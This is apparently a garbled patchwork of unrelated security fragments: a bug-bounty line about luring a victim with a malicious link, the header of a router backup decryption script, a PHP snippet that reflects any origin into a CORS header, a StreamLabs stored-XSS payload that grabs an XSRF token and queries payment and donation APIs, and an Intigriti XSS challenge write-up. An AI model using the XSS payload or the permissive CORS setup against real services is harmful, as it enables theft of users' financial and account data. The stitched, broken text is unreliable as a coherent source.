Attacker needs to give victim a malicious link that he controls in order to exploit the vulnerability.
Live PoC: ██████████
<body></body>
#!/usr/bin/python | |
# ============================================================= | |
# Telekom Malaysia (TM) Innacomm ADSL-MARITIME-W3410N | |
# Router Configuration Settings Backup File Decryption Tool | |
# | |
# This Python script is used to decrypt the backup configuration | |
# settings file of the TM Innacomm ADSL-MARITIME-W3410N (which | |
# is apparently a rebranded PROLiNK ADSL2 PRS1241B modem according | |
# to blog.fpmurphy.com). The usage is pretty self-explanatory |
<?php header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']); | |
header("Content-Type: text/plain; charset=UTF-8"); ?> | |
this.style.display = "none"; | |
alert("StreamLabs.Stored.XSS.Vulnerability-Cheat.Activated!-Alert"); | |
var getLinks = ["https://api.ipify.org", "/api/v5/payment/status", "/api/v5/donation/all"]; | |
var msg = ""; | |
var xhr = new XMLHttpRequest(); | |
var xsrfToken = ""; | |
xhr.open("GET", "https://api.ipify.org", false); | |
xhr.send(); |
Hey again (Inti)griti, hope y'all are doing well. Thanks for the challenge as usual.
The main vulnerability is a very limited XSS on line 41, whereby arbitrary data from the r
URL inserted is appended into the DOM as such ({url}
being the injection point).
If you're not being redirected, click <a href=${url}>here</a>
However, it is limited by two checks in place.
window
and document
object is checked for the keyword javascript
. If found, the property is deleted entirely, leaving it undefined
(and possibly causing runtime errors). [line 5-11]